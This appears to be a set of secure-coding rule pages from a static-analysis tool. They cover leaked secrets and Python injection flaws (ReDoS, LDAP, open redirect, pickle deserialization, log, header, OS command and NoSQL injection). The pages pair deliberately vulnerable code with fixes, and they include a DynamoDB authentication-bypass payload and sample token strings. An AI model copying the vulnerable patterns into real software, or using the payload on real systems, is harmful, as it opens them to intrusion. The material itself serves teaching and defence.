How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Any other use of the secret will also be impacted when it is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. This will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

MongoDB instances maintain a log that includes user authentication events. This log can be used to audit recent, potentially malicious connections.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

uri = "mongodb://foouser:foopass@example.com/testdb"

Compliant solution

import os

user = os.environ["MONGO_USER"]
password = os.environ["MONGO_PASSWORD"]
uri = f"mongodb://{user}:{password}@example.com/testdb"
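Note that if the credentials pulled from the environment contain characters that are reserved in URIs (such as @, :, or /), they must be percent-encoded before being embedded in the connection string. A minimal sketch, using hypothetical sample credentials in place of the environment lookup:

```python
from urllib.parse import quote_plus

# Hypothetical credentials; in practice these would be read from the
# environment or a secret vault as shown above.
user = "foouser"
password = "p@ss/word"

# Percent-encode the credentials so reserved URI characters cannot
# corrupt the connection string.
uri = f"mongodb://{quote_plus(user)}:{quote_plus(password)}@example.com/testdb"
```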

Resources

Standards

Documentation

secrets:S6292

Why is this an issue?

Amazon Marketplace Web Service credentials are designed to authenticate and authorize Amazon sellers.

If your application interacts with Amazon MWS then it requires credentials to access all the resources it needs to function properly. The credentials authenticate to a seller account which can have access to resources like products, orders, price or shipment information.

Recommended Secure Coding Practices

Only administrators should have access to the MWS credentials used by your application.

As a consequence, MWS credentials should not be stored along with the application code, as they would grant special privileges to anyone who has access to the application source code.

Credentials should be stored outside of the code in a file that is never committed to your application code repository.

If possible, a better alternative is to use your cloud provider’s service for managing secrets. On AWS this service is called Secrets Manager.

When credentials are disclosed in the application code, consider them as compromised and revoke them immediately.

Resources

secrets:S6691

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

A Google client OAuth secret is a confidential string that is used to authenticate and authorize applications when they interact with Google APIs. It is a part of the OAuth 2.0 protocol, which allows applications to access user data on their behalf.

The client secret is used in the OAuth flow to verify the identity of the application and ensure that only authorized applications can access user data. It is typically used in combination with a client ID, which identifies the application itself.

If a Google client OAuth secret leaks to an unintended audience, it can have serious security implications. Attackers who obtain the client secret can use it to impersonate the application and gain unauthorized access to user data. They can potentially access sensitive information, modify data, or perform actions on behalf of the user without their consent.

The exact capabilities of the attackers will depend on the authorizations the corresponding application has been granted.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Any other use of the secret will also be impacted when it is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. This will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Google Cloud console provides a Logs Explorer feature that can be used to audit recent access to a cloud infrastructure.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("client_secret", "TgxYWFmND-1NTYwNTgzMDM3N")

Compliant solution

props.set("client_secret", System.getenv("CLIENT_SECRET"))

Resources

Standards

Documentation

secrets:S6690

Secret leaks often occur when a sensitive piece of authentication data is stored with the source code of an application. Considering the source code is intended to be deployed across multiple assets, including source code repositories or application hosting servers, the secrets might get exposed to an unintended audience.

Why is this an issue?

In most cases, trust boundaries are violated when a secret is exposed in a source code repository or an uncontrolled deployment environment. Unintended people who don’t need to know the secret might get access to it. They might then be able to use it to gain unwanted access to associated services or resources.

The trust issue can be more or less severe depending on the people’s role and entitlement.

What is the potential impact?

GitLab tokens are used for authentication and authorization purposes. They are essentially access credentials that allow users or applications to interact with the GitLab API.

With a GitLab token, you can perform various operations such as creating, reading, updating, and deleting resources like repositories, issues, merge requests, and more. Tokens can also be scoped to limit the permissions and actions that can be performed.

A leaked GitLab token can have significant consequences for the security and integrity of the associated account and resources. It exposes the account to unauthorized access, potentially leading to data breaches and malicious actions. The unintended audience can exploit the leaked token to gain unauthorized entry into the GitLab account, allowing them to view, modify, or delete repositories, issues, and other resources. This unauthorized access can result in the exposure of sensitive data, such as proprietary code, customer information, or confidential documents, leading to potential data breaches.

Moreover, the unintended audience can perform malicious actions within the account, introducing vulnerabilities, injecting malicious code, or tampering with settings. This can compromise the security of the account and the integrity of the software development process.

Additionally, a leaked token can enable the unintended audience to take control of the GitLab account, potentially changing passwords, modifying settings, and adding or removing collaborators. This account takeover can disrupt development and collaboration workflows, causing reputational damage and operational disruptions.

Furthermore, the impact of a leaked token extends beyond the immediate account compromise. It can have regulatory and compliance implications, requiring organizations to report the breach, notify affected parties, and potentially face legal and financial consequences.

In general, the compromise of a GitLab token can lead to what are known as supply chain attacks, which can affect more than one’s own organization.

How to fix it

Revoke the secret

Revoke any leaked secrets and remove them from the application source code.

Before revoking the secret, ensure that no other applications or processes are using it. Any other use of the secret will also be impacted when it is revoked.

Analyze recent secret use

When available, analyze authentication logs to identify any unintended or malicious use of the secret since its disclosure date. This will help determine whether an attacker took advantage of the leaked secret and, if so, to what extent.

This operation should be part of a global incident response process.

Use a secret vault

A secret vault should be used to generate and store the new secret. This will ensure the secret’s security and prevent any further unexpected disclosure.

Depending on the development platform and the leaked secret type, multiple solutions are currently available.

Code examples

Noncompliant code example

props.set("token", "glpat-zcs1FfaxGnHfvzd7ExHz")

Compliant solution

props.set("token", System.getenv("TOKEN"))

Resources

Standards

pythonsecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection, attackers who discover the injection point can insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such a benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators, where replication systems detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Python Standard Library

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service (ReDoS) because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

from flask import Flask, request
import re

app = Flask(__name__)

@app.route('/lookup')
def lookup():
  regex = request.args['regex']
  data = request.args['data']

  re.search(regex, data) # Noncompliant

Compliant solution

from flask import Flask, request
import re

app = Flask(__name__)

@app.route('/lookup')
def lookup():
  regex = request.args['regex']
  data = request.args['data']

  re.search(re.escape(regex), data)

How does this work?

Sanitization and Validation

Escaping metacharacters with native functions is one defense against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.
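The allowlist approach described above can be sketched as follows; the ALLOWED_PATTERNS set and the safe_search helper are hypothetical names used for illustration:

```python
import re

# Hypothetical allowlist of regex patterns the application is willing to run.
ALLOWED_PATTERNS = {r"user-\d+", r"order-\d+"}

def safe_search(pattern: str, data: str):
    # Reject any user-supplied pattern that is not explicitly authorized.
    if pattern not in ALLOWED_PATTERNS:
        raise ValueError("pattern not in allowlist")
    return re.search(pattern, data)
```

Because only pre-vetted patterns ever reach the regex engine, neither injection nor catastrophic backtracking can be triggered by user input.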

Important note: The application must sanitize and validate on the server side, not on the client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution, re.escape escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

pythonsecurity:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can either be basic or blind, depending on whether the data fetched from the server is directly returned in the web application’s response.
The absence of a visible response to the malicious request is not a barrier to exploitation, so blind injections must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to find multiple footholds on target organizations by gathering authentication bypasses.

How to fix it in python-ldap

Code examples

The following noncompliant code is vulnerable to LDAP injection because untrusted data is concatenated to an LDAP query without prior sanitization or validation.

Noncompliant code example

from flask import Flask, request
import ldap

app = Flask(__name__)

@app.route("/user")
def user():
    username = request.args['username']

    search_filter = "(&(objectClass=user)(uid="+username+"))"

    ldap_connection = ldap.initialize("ldap://localhost:389")
    user = ldap_connection.search_s("dc=example,dc=org", ldap.SCOPE_SUBTREE, search_filter) # Noncompliant

    return user[0]

Compliant solution

from flask import Flask, request
import ldap
import ldap.filter

app = Flask(__name__)

@app.route("/user")
def user():
    username = ldap.filter.escape_filter_chars(request.args['username'])

    search_filter = "(&(objectClass=user)(uid="+username+"))"

    ldap_connection = ldap.initialize("ldap://localhost:389")
    user = ldap_connection.search_s("dc=example,dc=org", ldap.SCOPE_SUBTREE, search_filter)

    return user[0]

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

For LDAP injection, the cleanest way to do so is to use parameterized queries if it is available for your use case.

Another approach is to sanitize the input before using it in an LDAP query. Input sanitization should be primarily done using native libraries.

Alternatively, validation can be implemented using an allowlist approach by creating a list of authorized and secure strings you want the application to use in a query. If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must sanitize and validate on the server side, not on client-side front ends.

The most fundamental security mechanism is the restriction of LDAP metacharacters.

For Distinguished Names (DN), special characters that need to be escaped include:

  • \
  • #
  • +
  • <
  • >
  • ,
  • ;
  • "
  • =

For Search Filters, special characters that need to be escaped include:

  • *
  • (
  • )
  • \
  • null

For Python, the python-ldap library functions escape_filter_chars and escape_dn_chars allow sanitizing these characters.

In the compliant solution example, the escape_filter_chars is used to sanitize the search filter concatenated input.
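For illustration, the search-filter escaping can be sketched by hand; this is a minimal rendition of RFC 4515-style escaping, not a substitute for the library’s escape_filter_chars:

```python
def escape_filter_chars(value: str) -> str:
    # Minimal sketch: replace LDAP search-filter metacharacters with
    # their backslash-hex escape sequences (RFC 4515).
    replacements = {
        "\\": r"\5c",
        "*": r"\2a",
        "(": r"\28",
        ")": r"\29",
        "\x00": r"\00",
    }
    return "".join(replacements.get(ch, ch) for ch in value)
```

Mapping each character individually avoids the classic double-escaping bug that arises when the backslash is not handled before the other metacharacters.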

Resources

Standards

pythonsecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user into browsing a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to a malicious domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. It often requires the attacker to build a credible pretext to avoid arousing the victim’s suspicion.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of their choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker-controlled website mirroring the interface of a web application the user trusts. Because the application looks the same and the clicked hyperlink appears trustworthy, the user struggles to recognize that they are browsing a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker-controlled website that serves malware. As with the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that results in the download, and potential execution, of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Flask

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

from flask import Flask, redirect, request

app = Flask("example")

@app.route("/redirecting")
def redirecting():
    url = request.args["url"]
    return redirect(url) # Noncompliant

Compliant solution

from flask import Flask, redirect, request, url_for

app = Flask("example")

@app.route("/redirecting")
def redirecting():
    url = request.args["url"]
    return redirect(url_for(url))

How does this work?

Built-in framework methods should be preferred because, more often than not, they provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections, so they might not fit every use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.
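A safer alternative to prefix checks is to parse the URL and compare its authority exactly; a minimal sketch, with a hypothetical TRUSTED_HOST value:

```python
from urllib.parse import urlparse

TRUSTED_HOST = "example.com"  # hypothetical trusted authority

def is_safe_redirect(url: str) -> bool:
    # Compare the parsed scheme and authority exactly instead of using
    # a startswith-style prefix check, which cybersquatted domains such
    # as example.com.malicious.io would satisfy.
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.netloc == TRUSTED_HOST
```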

Resources

Standards

pythonsecurity:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization, attackers who detect the injection vector can inject a carefully crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges to administrator level and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

import pickle
from base64 import b64decode
from flask import request

def unsafe():
    objstr = b64decode(request.args.get("object"))
    obj = pickle.loads(objstr)
    return str(obj.status == "OK")

Compliant solution

import json
from flask import request

def safe():
    obj = json.loads(request.args.get("object"))
    return str(obj["status"] == "OK")

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example, integers, strings, or booleans).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.
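
As a sketch of the DTO approach, a class that only accepts primitive, explicitly validated fields could look like the following; OrderDTO and its field names are hypothetical:

```python
from dataclasses import dataclass

# Hypothetical DTO: only primitive, validated fields are exposed,
# instead of deserializing arbitrary objects from untrusted input.
@dataclass
class OrderDTO:
    product_id: int
    quantity: int

    @classmethod
    def from_dict(cls, data: dict) -> "OrderDTO":
        # int() rejects anything that is not a well-formed integer.
        return cls(product_id=int(data["product_id"]),
                   quantity=int(data["quantity"]))

order = OrderDTO.from_dict({"product_id": "42", "quantity": "3"})
print(order.quantity)  # -> 3
```

Because the constructor coerces and validates each field, a payload containing unexpected keys or object graphs never reaches the application logic.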

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application is responsible for both computing and validating the MAC, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymmetric signature algorithm should be used. This reduces the chances of a signing secret being leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.
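
The append-then-verify scheme described above can be sketched with Python's standard library; SECRET_KEY is a placeholder for a securely stored secret:

```python
import hashlib
import hmac
import json

SECRET_KEY = b"placeholder-secret"  # in practice, load this from secure storage

def serialize_with_mac(obj) -> bytes:
    # Serialize, then append an HMAC-SHA256 tag of the serialized bytes.
    payload = json.dumps(obj).encode("utf-8")
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest().encode()
    return payload + b"." + tag

def deserialize_with_mac(blob: bytes):
    # Verify the tag in constant time before deserializing anything.
    payload, _, tag = blob.rpartition(b".")
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC verification failed: data was tampered with")
    return json.loads(payload)
```

Any modification of the stored value invalidates the tag, so tampered data is rejected before it is ever deserialized.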

Resources

Standards

pythonsecurity:S5145

Why is this an issue?

Log injection occurs when an application fails to sanitize untrusted data used for logging.

An attacker can forge log content to prevent an organization from being able to trace back malicious activities.

What is the potential impact?

If an attacker can insert arbitrary data into a log file, the integrity of the chain of events being recorded can be compromised.
This frequently occurs because attackers can inject the log entry separator of the logger framework, commonly newlines, and thus insert artificial log entries.
Other attacks requiring only field pollution could also occur, such as cross-site scripting (XSS) or code injection (for example, Log4Shell), if the logged data is fed to other application components that may interpret the injected data differently.

The focus of this rule is newline character replacement.

Log Forge

An attacker who is able to create independent log entries by injecting log entry separators can insert bogus data into a log file to conceal their malicious activities. This makes it harder for an incident response team to trace the origin of the breach, as the indicators of compromise (IoCs) lead to fake application events.

How to fix it in Flask

Code examples

The following code is vulnerable to log injection as it constructs log entries using untrusted data. An attacker can leverage this to manipulate the chain of events being recorded.

Noncompliant code example

import logging

from flask import Flask, request

app = Flask(__name__)

@app.route('/example')
def log():
    data = request.args["data"]
    app.logger.critical("%s", data) # Noncompliant

Compliant solution

import logging
import base64

from flask import Flask, request

app = Flask(__name__)

@app.route('/example')
def log():
    data = request.args["data"]
    if data.isalnum():
        app.logger.critical("%s", data)
    else:
        app.logger.critical("Invalid Input: %s", base64.b64encode(data.encode('UTF-8')))

How does this work?

Data used for logging should be content-restricted and typed. This can be done by validating the data content or sanitizing it.
Validation and sanitization mainly revolve around preventing carriage return (CR) and line feed (LF) characters. However, further actions could be required based on the application context and the logged data usage.

Here, the example compliant code uses the isalnum function to ensure the untrusted data is safe. If not, it performs Base64 encoding to protect from log injection.
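
If non-alphanumeric data must be logged verbatim, a minimal sanitizer that neutralizes the CR and LF separators could look like this sketch (sanitize_for_log is an illustrative helper, not a Flask API):

```python
def sanitize_for_log(value: str) -> str:
    # Replace log entry separators with visible escape sequences so
    # attacker-controlled input cannot forge additional log entries.
    return value.replace("\r", "\\r").replace("\n", "\\n")

# A payload attempting to inject a fake entry is flattened onto one line.
print(sanitize_for_log("user=alice\n127.0.0.1 admin login OK"))
```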

Resources

Standards

pythonsecurity:S5167

This rule is deprecated; use S5122, S5146, S6287 instead.

Why is this an issue?

User-provided data, such as URL parameters, POST data payloads, or cookies, should always be considered untrusted and tainted. Applications constructing HTTP response headers based on tainted data could allow attackers to change security sensitive headers like Cross-Origin Resource Sharing headers.

Web application frameworks and servers might also allow attackers to inject newline characters into headers to craft malformed HTTP responses. In this case, the application would be vulnerable to a larger range of attacks, such as HTTP Response Splitting/Smuggling. Most of the time, this type of attack is mitigated by default in modern web application frameworks, but there might be rare cases where older versions are still vulnerable.

As a best practice, applications that use user-provided data to construct the response header should always validate the data first. Validation should be based on a whitelist.

Noncompliant code example

Flask

from flask import Response, request
from werkzeug.datastructures import Headers

@app.route('/route')
def route():
    content_type = request.args["Content-Type"]
    response = Response()
    headers = Headers()
    headers.add("Content-Type", content_type) # Noncompliant
    response.headers = headers
    return response

Django

import django.http

def route(request):
    content_type = request.GET.get("Content-Type")
    response = django.http.HttpResponse()
    response.__setitem__('Content-Type', content_type) # Noncompliant
    return response

Compliant solution

Flask

from flask import Response, request
from werkzeug.datastructures import Headers
import re

@app.route('/route')
def route():
    content_type = request.args["Content-Type"]
    allowed_content_types = r'application/(pdf|json|xml)'
    response = Response()
    headers = Headers()
    if re.match(allowed_content_types, content_type):
        headers.add("Content-Type", content_type)  # Compliant
    else:
        headers.add("Content-Type", "application/json")
    response.headers = headers
    return response

Django

import django.http
import re

def route(request):
    content_type = request.GET.get("Content-Type")
    allowed_content_types = r'application/(pdf|json|xml)'
    response = django.http.HttpResponse()
    if re.match(allowed_content_types, content_type):
        response.__setitem__('Content-Type', content_type) # Compliant
    else:
        response.__setitem__('Content-Type', "application/json")
    return response

Resources

pythonsecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Python Standard Library

Code examples

The following code is vulnerable to command injection because it uses untrusted input to set up a new process. Therefore, an attacker can execute an arbitrary program that is installed on the system.

In particular, in this example, if the host request parameter contains system shell control characters, the expected ping command behavior will be changed.

Noncompliant code example

import os
from flask import request

def ping():
    cmd = "ping -c 1 %s" % request.args.get("host", "www.google.com")
    status = os.system(cmd) # Noncompliant
    return str(status == 0)

Compliant solution

import subprocess
from flask import request

def safe_ping():
    host = request.args.get("host", "www.google.com")
    status = subprocess.run(["ping", "-c", "1", "--", host]).returncode
    return str(status == 0)

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, keep them simple to avoid ReDoS attacks. For example, you can accept only a specific set of executables by using ^/bin/(ls|pwd|grep)$.

Important note: The application must do validation on the server side, not on client-side front-ends.
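
The server-side, regex-based allowlist described above can be sketched as follows; the accepted command set is illustrative:

```python
import re

# Only these absolute paths are accepted; everything else is rejected.
ALLOWED_COMMANDS = re.compile(r"^/bin/(ls|pwd|grep)$")

def is_allowed(command: str) -> bool:
    # fullmatch semantics via ^...$: trailing shell metacharacters fail.
    return ALLOWED_COMMANDS.match(command) is not None

print(is_allowed("/bin/ls"))             # accepted
print(is_allowed("/bin/ls; rm -rf /"))   # rejected: extra characters
```

The anchors ensure an attacker cannot append arguments or shell control characters to an otherwise valid command.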

Neutralize special characters

If the application is to execute complex commands that cannot be restricted to a pre-approved list, the cleanest approach is to use components that neutralize special characters, such as the subprocess module.

The module neutralizes common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • `
  • \
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters include ', - and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since its version 2.24.

In the example compliant code, using the subprocess.run function helps to escape the passed arguments. It accepts a list of command arguments that will be properly escaped and concatenated to form the command line to execute.

Disable shell integration

In most cases, command execution libraries offer two ways to execute an external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

In the example compliant code, using the subprocess module’s functions is preferred over older alternatives such as os.system or os.popen. Indeed, subprocess, while still a dangerous library, disables the system shell’s syntax interpretation by default.
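
The effect of disabling shell integration can be demonstrated directly: with a list of arguments and the default shell=False, shell metacharacters in user input are passed verbatim to the program instead of being interpreted:

```python
import subprocess

# The payload contains a command separator, but it is handed to echo as
# a single literal argument; no shell ever parses it.
payload = "hello; echo INJECTED"
result = subprocess.run(["echo", payload], capture_output=True, text=True)
print(result.stdout.strip())  # the payload is printed verbatim, not executed
```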

Resources

Documentation

Standards

pythonsecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This misbehavior can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Amazon DynamoDB

Code examples

The following code is vulnerable to NoSQL injection because untrusted data is concatenated to the FilterExpression value. This expression determines which items within the results should be returned.

A malicious HTTP request containing the following query parameter values username=admin&password=size(password) or size(password)=size(password) would allow an attacker to manipulate the returned data and bypass authentication.

Noncompliant code example

@app.route('/login')
def login():
    dynamodb = AWS_SESSION.client('dynamodb')

    username = request.args["username"]
    password = request.args["password"]

    dynamodb.scan(
        FilterExpression= "username = " + username + " and password = " + password, # Noncompliant
        TableName="users",
        ProjectionExpression="username"
    )

Compliant solution

@app.route('/login')
def login():
    dynamodb = AWS_SESSION.client('dynamodb')

    username = request.args["username"]
    password = request.args["password"]

    dynamodb.query(
        KeyConditionExpression= "username = :u",
        FilterExpression= "password = :p",
        ExpressionAttributeValues={
            ":u": { 'S': username },
            ":p": { 'S': password }
        },
        TableName="users",
        ProjectionExpression="username"
    )

How does this work?

